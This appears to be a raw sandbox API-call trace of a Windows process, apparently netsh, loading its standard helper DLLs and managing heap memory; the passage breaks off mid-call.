__dllonexit () returned 0x7fef4138b90 [0173.962] __dllonexit () returned 0x7fef4138bb4 [0173.962] __dllonexit () returned 0x7fef40b6ae0 [0173.962] GetVersion () returned 0x1db10106 [0173.962] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0173.963] GetSystemMetrics (nIndex=11) returned 32 [0173.963] GetSystemMetrics (nIndex=12) returned 32 [0173.963] GetSystemMetrics (nIndex=2) returned 17 [0173.963] GetSystemMetrics (nIndex=3) returned 17 [0173.963] GetDC (hWnd=0x0) returned 0x100101fa [0173.963] GetDeviceCaps (hdc=0x100101fa, index=88) returned 96 [0173.963] GetDeviceCaps (hdc=0x100101fa, index=90) returned 96 [0173.963] ReleaseDC (hWnd=0x0, hDC=0x100101fa) returned 1 [0173.963] GetSysColor (nIndex=15) returned 0xf0f0f0 [0173.963] GetSysColor (nIndex=16) returned 0xa0a0a0 [0173.963] GetSysColor (nIndex=20) returned 0xffffff [0173.963] GetSysColor (nIndex=18) returned 0x0 [0173.963] GetSysColor (nIndex=6) returned 0x646464 [0173.963] GetSysColorBrush (nIndex=15) returned 0x1100059 [0173.963] GetSysColorBrush (nIndex=6) returned 0x1100061 [0173.963] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0173.963] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0173.963] __dllonexit () returned 0x7fef4138f84 [0173.964] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fe [0173.964] __dllonexit () returned 0x7fef40c3990 [0173.964] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0173.964] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0173.964] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0173.964] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0173.964] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0173.964] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0173.964] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0173.964] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0173.964] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0173.964] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0173.964] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0173.964] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0173.964] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fe [0173.965] __dllonexit () returned 0x7fef41475a4 [0173.965] __dllonexit () returned 0x7fef41475bc [0173.965] __dllonexit () returned 0x7fef41475c8 [0173.965] __dllonexit () returned 0x7fef41475d4 [0173.965] __dllonexit () returned 0x7fef41475e0 [0173.965] GetCursorPos (in: lpPoint=0x7fef41a26d8 | out: lpPoint=0x7fef41a26d8*(x=449, y=294)) returned 1 [0173.966] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2f6730 [0173.966] LocalReAlloc (hMem=0x2f4280, uBytes=0x18, uFlags=0x2) returned 0x2f6840 [0173.966] GetCurrentThread () returned 0xfffffffffffffffe [0173.966] GetCurrentThreadId () returned 0x560 [0173.966] __dllonexit () returned 0x7fef413cfa4 [0173.966] SetErrorMode (uMode=0x0) returned 0x8001 [0173.966] SetErrorMode (uMode=0x8001) returned 0x0 [0173.966] GetModuleFileNameW (in: hModule=0x7fef4080000, lpFilename=0x1e6af0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0173.966] wcscpy_s (in: _Destination=0x1e6d00, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0173.966] FindResourceW (hModule=0x7fef4080000, lpName=0xe01, lpType=0x6) returned 0x2409b0 [0173.967] LoadStringW (in: hInstance=0x7fef4080000, uID=0xe000, lpBuffer=0x1e6f10, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0173.967] wcscpy_s (in: _Destination=0x1e6b24, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0173.967] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0173.968] malloc (_Size=0x80) returned 0x257ea0 [0173.968] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x2f6860 [0173.968] GetSystemDirectoryA (in: lpBuffer=0x1e7190, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0173.968] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0173.968] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0173.968] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0173.968] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0173.969] GetProcAddress (hModule=0x7fef83a0000, lpProcName="InitHelperDll") returned 0x7fef83bcf70 [0173.969] InitHelperDll () returned 0x0 [0173.970] RegisterHelper () returned 0x0 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x108) returned 0x2f8970 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eeb10 | out: hHeap=0x2d0000) returned 1 [0173.970] RegisterHelper () returned 0x0 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x160) returned 0x2f8a80 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8970 | out: hHeap=0x2d0000) returned 1 [0173.970] RegisterHelper () returned 0x0 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1b8) returned 0x2f8bf0 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8a80 | out: hHeap=0x2d0000) returned 1 [0173.970] RegisterHelper () returned 0x0 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x210) returned 0x2f8970 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8bf0 | out: hHeap=0x2d0000) returned 1 [0173.970] RegisterHelper () returned 0x0 [0173.970] GetProcessHeap () returned 0x2d0000 [0173.970] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x268) returned 0x2f8b90 [0173.971] GetProcessHeap () returned 0x2d0000 [0173.971] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8970 | out: hHeap=0x2d0000) returned 1 [0173.971] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="nshwfp", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0173.971] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0173.971] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0173.971] GetProcessHeap () returned 0x2d0000 [0173.971] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f8970 [0173.971] GetProcessHeap () returned 0x2d0000 [0173.971] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe) returned 0x2f4280 [0173.971] GetProcessHeap () returned 0x2d0000 [0173.971] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x2f42a0 [0173.971] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0173.971] GetProcessHeap () returned 0x2d0000 [0173.971] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f47d0 | out: hHeap=0x2d0000) returned 1 [0173.971] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef3fb0000 [0173.984] GetProcAddress (hModule=0x7fef3fb0000, lpProcName="InitHelperDll") returned 0x7fef401b6d0 [0173.984] InitHelperDll () returned 0x0 [0173.984] RegisterHelper () returned 0x0 [0173.984] GetProcessHeap () returned 0x2d0000 [0173.984] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2c0) returned 0x302db0 [0173.984] GetProcessHeap () returned 0x2d0000 [0173.984] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b90 | out: hHeap=0x2d0000) returned 1 [0173.984] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="dhcpclient", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0173.985] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0173.985] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0173.985] GetProcessHeap () returned 0x2d0000 [0173.985] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa0) returned 0x2f8b90 [0173.985] GetProcessHeap () returned 0x2d0000 [0173.985] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x2f42c0 [0173.985] GetProcessHeap () returned 0x2d0000 [0173.985] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x22) returned 0x2f91f0 [0173.985] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0173.985] GetProcessHeap () returned 0x2d0000 [0173.985] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8970 | out: hHeap=0x2d0000) returned 1 [0173.985] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef82d0000 [0173.994] GetProcAddress (hModule=0x7fef82d0000, lpProcName="InitHelperDll") returned 0x7fef82d1a40 [0173.994] InitHelperDll () returned 0x0 [0173.995] RegisterHelper () returned 0x0 [0173.995] GetProcessHeap () returned 0x2d0000 [0173.995] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x318) returned 0x307d80 [0173.995] GetProcessHeap () returned 0x2d0000 [0173.995] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x302db0 | out: hHeap=0x2d0000) returned 1 [0173.995] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="wshelper", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0173.995] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0173.995] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0173.995] GetProcessHeap () returned 0x2d0000 [0173.995] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc8) returned 0x302db0 [0173.995] GetProcessHeap () returned 0x2d0000 [0173.995] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x305530 [0173.995] GetProcessHeap () returned 0x2d0000 [0173.995] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x303530 [0173.995] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0173.995] GetProcessHeap () returned 0x2d0000 [0173.995] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b90 | out: hHeap=0x2d0000) returned 1 [0173.995] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef7ab0000 [0173.999] GetProcAddress (hModule=0x7fef7ab0000, lpProcName="InitHelperDll") returned 0x7fef7ab1720 [0173.999] InitHelperDll () returned 0x0 [0174.006] RegisterHelper () returned 0x0 [0174.006] GetProcessHeap () returned 0x2d0000 [0174.006] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x370) returned 0x308af0 [0174.007] GetProcessHeap () returned 0x2d0000 [0174.007] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x307d80 | out: hHeap=0x2d0000) returned 1 [0174.007] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="nshhttp", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.007] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0174.007] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0174.007] GetProcessHeap () returned 0x2d0000 [0174.007] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xf0) returned 0x308e70 [0174.007] GetProcessHeap () returned 0x2d0000 [0174.007] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x305550 [0174.007] GetProcessHeap () returned 0x2d0000 [0174.007] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x305570 [0174.007] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0174.007] GetProcessHeap () returned 0x2d0000 [0174.007] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x302db0 | out: hHeap=0x2d0000) returned 1 [0174.007] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fef7aa0000 [0174.010] GetProcAddress (hModule=0x7fef7aa0000, lpProcName="InitHelperDll") returned 0x7fef7aa1c24 [0174.010] InitHelperDll () returned 0x0 [0174.010] RegisterHelper () returned 0x0 [0174.010] GetProcessHeap () returned 0x2d0000 [0174.010] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x3c8) returned 0x308f70 [0174.010] GetProcessHeap () returned 0x2d0000 [0174.010] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308af0 | out: hHeap=0x2d0000) returned 1 [0174.010] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="fwcfg", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.011] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0174.011] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0174.011] GetProcessHeap () returned 0x2d0000 [0174.011] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x118) returned 0x307d80 [0174.011] GetProcessHeap () returned 0x2d0000 [0174.011] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x305590 [0174.011] GetProcessHeap () returned 0x2d0000 [0174.011] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x3055b0 [0174.011] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0174.011] GetProcessHeap () returned 0x2d0000 [0174.011] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308e70 | out: hHeap=0x2d0000) returned 1 [0174.011] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef7a70000 [0174.015] GetProcAddress (hModule=0x7fef7a70000, lpProcName="InitHelperDll") returned 0x7fef7a72d20 [0174.015] InitHelperDll () returned 0x0 [0174.015] RegisterHelper () returned 0x0 [0174.015] GetProcessHeap () returned 0x2d0000 [0174.015] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x420) returned 0x308af0 [0174.015] GetProcessHeap () returned 0x2d0000 [0174.015] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308f70 | out: hHeap=0x2d0000) returned 1 [0174.015] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="authfwcfg", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.015] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0174.015] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0174.015] GetProcessHeap () returned 0x2d0000 [0174.015] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x140) returned 0x308f20 [0174.015] GetProcessHeap () returned 0x2d0000 [0174.015] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x3055f0 [0174.015] GetProcessHeap () returned 0x2d0000 [0174.015] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c) returned 0x3086a0 [0174.015] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0174.015] GetProcessHeap () returned 0x2d0000 [0174.016] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x307d80 | out: hHeap=0x2d0000) returned 1 [0174.016] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef4320000 [0174.020] GetProcAddress (hModule=0x7fef4320000, lpProcName="InitHelperDll") returned 0x7fef4325d20 [0174.020] InitHelperDll () returned 0x0 [0174.021] RegisterHelper () returned 0x0 [0174.021] GetProcessHeap () returned 0x2d0000 [0174.021] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x478) returned 0x3107d0 [0174.021] GetProcessHeap () returned 0x2d0000 [0174.021] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308af0 | out: hHeap=0x2d0000) returned 1 [0174.021] RegisterHelper () returned 0x0 [0174.021] GetProcessHeap () returned 0x2d0000 [0174.021] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4d0) returned 0x310c50 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3107d0 | out: hHeap=0x2d0000) returned 1 [0174.022] RegisterHelper () returned 0x0 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x528) returned 0x311130 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310c50 | out: hHeap=0x2d0000) returned 1 [0174.022] RegisterHelper () returned 0x0 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x580) returned 0x3107d0 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x311130 | out: hHeap=0x2d0000) returned 1 [0174.022] RegisterHelper () returned 0x0 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x5d8) returned 0x310d60 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3107d0 | out: hHeap=0x2d0000) returned 1 [0174.022] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="2", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.022] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0174.022] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x168) returned 0x309070 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4) returned 0x2f8bb0 [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x310200 [0174.022] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0174.022] GetProcessHeap () returned 0x2d0000 [0174.022] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308f20 | out: hHeap=0x2d0000) returned 1 [0174.023] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef43b0000 [0174.032] GetProcAddress (hModule=0x7fef43b0000, lpProcName="InitHelperDll") returned 0x7fef43b1924 [0174.032] InitHelperDll () returned 0x0 [0174.032] RegisterHelper () returned 0x0 [0174.032] GetProcessHeap () returned 0x2d0000 [0174.032] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x630) returned 0x312c10 [0174.033] GetProcessHeap () returned 0x2d0000 [0174.033] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310d60 | out: hHeap=0x2d0000) returned 1 [0174.033] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="netiohlp", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.033] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0174.033] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0174.033] GetProcessHeap () returned 0x2d0000 [0174.033] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x190) returned 0x308af0 [0174.033] GetProcessHeap () returned 0x2d0000 [0174.033] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x310320 [0174.033] GetProcessHeap () returned 0x2d0000 [0174.033] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x311a30 [0174.033] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0174.033] GetProcessHeap () returned 0x2d0000 [0174.033] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x309070 | out: hHeap=0x2d0000) returned 1 [0174.033] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef3f70000 [0174.037] GetProcAddress (hModule=0x7fef3f70000, lpProcName="InitHelperDll") returned 0x7fef3f8ce30 [0174.037] InitHelperDll () returned 0x0 [0174.037] RegisterHelper () returned 0x0 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x688) returned 0x308c90 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312c10 | out: hHeap=0x2d0000) returned 1 [0174.037] RegisterHelper () returned 0x0 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x6e0) returned 0x312c10 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308c90 | out: hHeap=0x2d0000) returned 1 [0174.037] RegisterHelper () returned 0x0 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x738) returned 0x313300 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312c10 | out: hHeap=0x2d0000) returned 1 [0174.037] RegisterHelper () returned 0x0 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x790) returned 0x313a40 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x313300 | out: hHeap=0x2d0000) returned 1 [0174.037] RegisterHelper () returned 0x0 [0174.037] GetProcessHeap () returned 0x2d0000 [0174.037] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x7e8) returned 0x3141e0 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x313a40 | out: hHeap=0x2d0000) returned 1 [0174.038] RegisterHelper () returned 0x0 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x840) returned 0x312c10 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3141e0 | out: hHeap=0x2d0000) returned 1 [0174.038] RegisterHelper () returned 0x0 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x898) returned 0x313460 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312c10 | out: hHeap=0x2d0000) returned 1 [0174.038] RegisterHelper () returned 0x0 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8f0) returned 0x313d00 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x313460 | out: hHeap=0x2d0000) returned 1 [0174.038] RegisterHelper () returned 0x0 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x948) returned 0x314600 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x313d00 | out: hHeap=0x2d0000) returned 1 [0174.038] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="whhelper", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.038] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0174.038] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1b8) returned 0x310fd0 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x310360 [0174.038] GetProcessHeap () returned 0x2d0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x310b90 [0174.039] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0174.039] GetProcessHeap () returned 0x2d0000 [0174.039] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308af0 | out: hHeap=0x2d0000) returned 1 [0174.039] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef4310000 [0174.042] GetProcAddress (hModule=0x7fef4310000, lpProcName="InitHelperDll") returned 0x7fef431210c [0174.043] InitHelperDll () returned 0x0 [0174.043] RegisterHelper () returned 0x0 [0174.043] GetProcessHeap () returned 0x2d0000 [0174.043] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x9a0) returned 0x313c10 [0174.043] GetProcessHeap () returned 0x2d0000 [0174.043] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314600 | out: hHeap=0x2d0000) returned 1 [0174.043] RegEnumValueW (in: 